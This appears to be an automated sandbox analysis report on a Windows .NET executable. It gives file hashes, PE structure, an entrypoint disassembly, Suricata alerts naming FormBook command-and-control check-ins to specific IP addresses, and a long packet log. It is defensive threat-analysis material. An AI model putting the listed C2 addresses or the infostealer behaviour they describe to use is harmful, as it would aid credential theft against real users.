                                                            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif:Zone.Identifier

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif:Zone.Identifier

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            C:\Users\user\Documents\4Ear91jgQ7.pif.pif:Zone.Identifier

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            C:\Users\user\Documents\4Ear91jgQ7.pif:Zone.Identifier

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):6.459218145787354
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:4Ear91jgQ7.exe
                                                            File size:33'792 bytes
                                                            MD5:dcf2ceb7faa5754e5fb0b7db1cc23637
                                                            SHA1:0259609ed1ec649f797869ca14a7aef9f2029ffb
                                                            SHA256:9732f930cd31110f63aaf92cc17895b65303bb06a4968b127f4687270941acdd
                                                            SHA512:2f2347bf1fffe021deaae8a77695026498d8d9c8e715ed991cdaa4086c4df9196d4592855947912c27b7bb56f1567f92fe1cfaf324d2d41291618009b26fb487
                                                            SSDEEP:384:dHjYE/8qnRY1yoY4CTj0MiKSFp9paTqjkSdKrA+5WmC9NAkYIbdkK8oy10jq4ryj:ZEi7/iKSBpaPL0XY0jSSfOf876sNfpE
                                                            TLSH:A1E23A1177C94AB7CBEB0775602053214B30E7539E17FB9EA86C124A49963CF56833F6
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0..V...........t... ........@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:8132a94c4c6db28d

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4074e2
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xE66E8ABF [Fri Jul 4 10:02:39 2092 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            jne 00007EFE5C6F6F02h
                                                            add byte ptr [eax], al
                                                            and al, 75h
                                                            add byte ptr [eax], al
                                                            and al, 57h
                                                            add byte ptr [eax], al
                                                            push edx
                                                            push ebx
                                                            inc esp
                                                            push ebx
                                                            mov ah, AAh
                                                            push cs
                                                            outsb
                                                            jmp 00007EFE10AFFFFAh
                                                            sub al, DFh
                                                            sbb ebx, ecx

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x74880x57.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x2868.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x75080x1c.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x559c0x5600b9a21dacf3da7f757da2dc426e71962bFalse0.4675690406976744data5.857346871097696IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x80000x28680x2a00049bcb7e6c6daf97c16039e250ae2436False0.8681175595238095data7.470403058205651IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xc0000xc0x200e595f29153c180472b421a788e0f07f3False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x81300x221bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9794983392509449
                                                            RT_GROUP_ICON0xa34c0x14data1.05
                                                            RT_VERSION0xa3600x31cdata0.4296482412060301
                                                            RT_MANIFEST0xa67c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                            2024-07-23T14:50:57.879866+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34974280192.168.2.543.155.26.241
                                                            2024-07-23T14:51:22.805881+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24974680192.168.2.543.155.26.241
                                                            2024-07-23T14:50:55.333044+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973980192.168.2.543.155.26.241
                                                            2024-07-23T14:50:42.942343+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973080192.168.2.584.32.84.121
                                                            2024-07-23T14:51:00.411005+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34974480192.168.2.543.155.26.241
                                                            2024-07-23T14:50:40.420760+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34972880192.168.2.584.32.84.121
                                                            2024-07-23T14:50:45.608238+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34973280192.168.2.584.32.84.121
                                                            2024-07-23T14:50:11.389671+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24972280192.168.2.523.227.38.74
                                                            2024-07-23T14:50:48.333694+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24973480192.168.2.584.32.84.121

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 23, 2024 14:49:17.398736954 CEST49704443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:17.398778915 CEST4434970413.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:17.398893118 CEST49704443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:17.405807972 CEST49704443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:17.405822039 CEST4434970413.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:18.058460951 CEST4434970413.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:18.058535099 CEST49704443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:18.062836885 CEST49704443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:18.062859058 CEST4434970413.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:18.063128948 CEST4434970413.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:18.114176035 CEST49704443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:18.128101110 CEST49704443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:18.168509007 CEST4434970413.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:18.878813028 CEST4434970413.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:18.878916979 CEST4434970413.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:18.878983021 CEST49704443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:18.941673040 CEST49704443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:33.147525072 CEST49706443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:33.147568941 CEST4434970613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:33.147639990 CEST49706443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:33.152163982 CEST49706443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:33.152193069 CEST4434970613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:33.764947891 CEST4434970613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:33.765233040 CEST49706443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:33.767937899 CEST49706443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:33.767951012 CEST4434970613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:33.768523932 CEST4434970613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:33.817161083 CEST49706443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:33.832995892 CEST49706443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:33.876508951 CEST4434970613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:34.409106016 CEST4434970613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:34.409188032 CEST4434970613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:34.409257889 CEST49706443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:34.412091970 CEST49706443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:42.159876108 CEST49716443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:42.159919024 CEST4434971613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:42.160021067 CEST49716443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:42.167023897 CEST49716443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:42.167036057 CEST4434971613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:42.758021116 CEST4434971613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:42.758090973 CEST49716443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:42.762423038 CEST49716443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:42.762432098 CEST4434971613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:42.762701035 CEST4434971613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:42.814125061 CEST49716443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:42.856508017 CEST4434971613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:43.416565895 CEST4434971613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:43.416644096 CEST4434971613.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:43.416779995 CEST49716443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:43.419639111 CEST49716443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:52.556776047 CEST49718443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:52.556819916 CEST4434971813.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:52.556900024 CEST49718443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:52.561096907 CEST49718443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:52.561110973 CEST4434971813.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:54.027791977 CEST4434971813.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:54.027879000 CEST49718443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:54.029479980 CEST49718443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:54.029489994 CEST4434971813.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:54.029769897 CEST4434971813.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:54.082812071 CEST49718443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:54.095797062 CEST49718443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:54.140503883 CEST4434971813.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:54.693691015 CEST4434971813.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:54.693783998 CEST4434971813.107.137.11192.168.2.5
                                                            Jul 23, 2024 14:49:54.693972111 CEST49718443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:49:54.696455956 CEST49718443192.168.2.513.107.137.11
                                                            Jul 23, 2024 14:50:08.995461941 CEST49720443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:08.995492935 CEST4434972013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:08.995579004 CEST49720443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:08.999681950 CEST49720443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:08.999695063 CEST4434972013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:09.609152079 CEST4434972013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:09.609232903 CEST49720443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:09.610801935 CEST49720443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:09.610812902 CEST4434972013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:09.611059904 CEST4434972013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:09.664880991 CEST49720443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:09.749197006 CEST49720443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:09.796503067 CEST4434972013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:10.377449989 CEST4434972013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:10.382057905 CEST4434972013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:10.382313967 CEST49720443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:10.384974003 CEST49720443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:10.824328899 CEST4972280192.168.2.523.227.38.74
                                                            Jul 23, 2024 14:50:10.829345942 CEST804972223.227.38.74192.168.2.5
                                                            Jul 23, 2024 14:50:10.829463005 CEST4972280192.168.2.523.227.38.74
                                                            Jul 23, 2024 14:50:10.832081079 CEST4972280192.168.2.523.227.38.74
                                                            Jul 23, 2024 14:50:10.837121964 CEST804972223.227.38.74192.168.2.5
                                                            Jul 23, 2024 14:50:11.389540911 CEST804972223.227.38.74192.168.2.5
                                                            Jul 23, 2024 14:50:11.389564991 CEST804972223.227.38.74192.168.2.5
                                                            Jul 23, 2024 14:50:11.389671087 CEST4972280192.168.2.523.227.38.74
                                                            Jul 23, 2024 14:50:11.390037060 CEST804972223.227.38.74192.168.2.5
                                                            Jul 23, 2024 14:50:11.390079975 CEST4972280192.168.2.523.227.38.74
                                                            Jul 23, 2024 14:50:11.393095970 CEST4972280192.168.2.523.227.38.74
                                                            Jul 23, 2024 14:50:11.398780107 CEST804972223.227.38.74192.168.2.5
                                                            Jul 23, 2024 14:50:19.017030001 CEST49724443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:19.017085075 CEST4434972413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:19.017151117 CEST49724443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:19.022157907 CEST49724443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:19.022176027 CEST4434972413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:19.609421968 CEST4434972413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:19.609611034 CEST49724443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:19.618043900 CEST49724443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:19.618076086 CEST4434972413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:19.618406057 CEST4434972413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:19.676580906 CEST49724443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:19.718719006 CEST49724443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:19.760499954 CEST4434972413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:20.535346985 CEST4434972413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:20.535445929 CEST4434972413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:20.535517931 CEST49724443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:20.538292885 CEST49724443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:29.632205009 CEST49726443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:29.632240057 CEST4434972613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:29.632320881 CEST49726443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:29.636426926 CEST49726443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:29.636445045 CEST4434972613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:30.253243923 CEST4434972613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:30.253345013 CEST49726443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:30.254805088 CEST49726443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:30.254812002 CEST4434972613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:30.255074978 CEST4434972613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:30.299859047 CEST49726443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:30.344497919 CEST4434972613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:30.928626060 CEST4434972613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:30.928719044 CEST4434972613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:30.928771973 CEST49726443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:30.931324005 CEST49726443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:39.929625034 CEST4972880192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:39.934719086 CEST804972884.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:39.934782028 CEST4972880192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:39.936696053 CEST4972880192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:39.941756964 CEST804972884.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:40.420574903 CEST804972884.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:40.420696020 CEST804972884.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:40.420759916 CEST4972880192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:41.442243099 CEST4972880192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:42.468039036 CEST4973080192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:42.473023891 CEST804973084.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:42.473124027 CEST4973080192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:42.475423098 CEST4973080192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:42.480429888 CEST804973084.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:42.942187071 CEST804973084.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:42.942284107 CEST804973084.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:42.942342997 CEST4973080192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:43.990449905 CEST4973080192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:44.057051897 CEST49731443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:44.057110071 CEST4434973113.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:44.057180882 CEST49731443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:44.063000917 CEST49731443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:44.063030005 CEST4434973113.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:44.651189089 CEST4434973113.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:44.651274920 CEST49731443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:44.655280113 CEST49731443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:44.655292034 CEST4434973113.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:44.655648947 CEST4434973113.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:44.785881996 CEST49731443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:45.106930017 CEST4973280192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:45.108736038 CEST49731443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:45.111967087 CEST804973284.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:45.112047911 CEST4973280192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:45.114217997 CEST4973280192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:45.119200945 CEST804973284.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:45.119359970 CEST804973284.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:45.152510881 CEST4434973113.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:45.608026028 CEST804973284.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:45.608180046 CEST804973284.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:45.608237982 CEST4973280192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:45.730437994 CEST4434973113.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:45.730644941 CEST4434973113.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:45.730734110 CEST49731443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:45.733417034 CEST49731443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:46.629951954 CEST4973280192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:47.665179968 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:47.673022032 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:47.674644947 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:47.676683903 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:47.686676025 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:48.333549023 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:48.333570957 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:48.333584070 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:48.333693981 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:48.333736897 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:48.333878040 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:48.333914995 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:48.336189032 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:48.569380999 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:48.569442034 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:48.572124958 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:52.686212063 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:52.686245918 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:52.686397076 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:52.690474987 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:52.690486908 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.306473017 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.306583881 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:53.308094025 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:53.308101892 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.308476925 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.369577885 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:53.412508011 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.820727110 CEST4973980192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:53.825907946 CEST804973943.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:53.825994015 CEST4973980192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:53.828190088 CEST4973980192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:53.833081961 CEST804973943.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:53.954710007 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.963421106 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.963498116 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:53.965840101 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:55.333044052 CEST4973980192.168.2.543.155.26.241
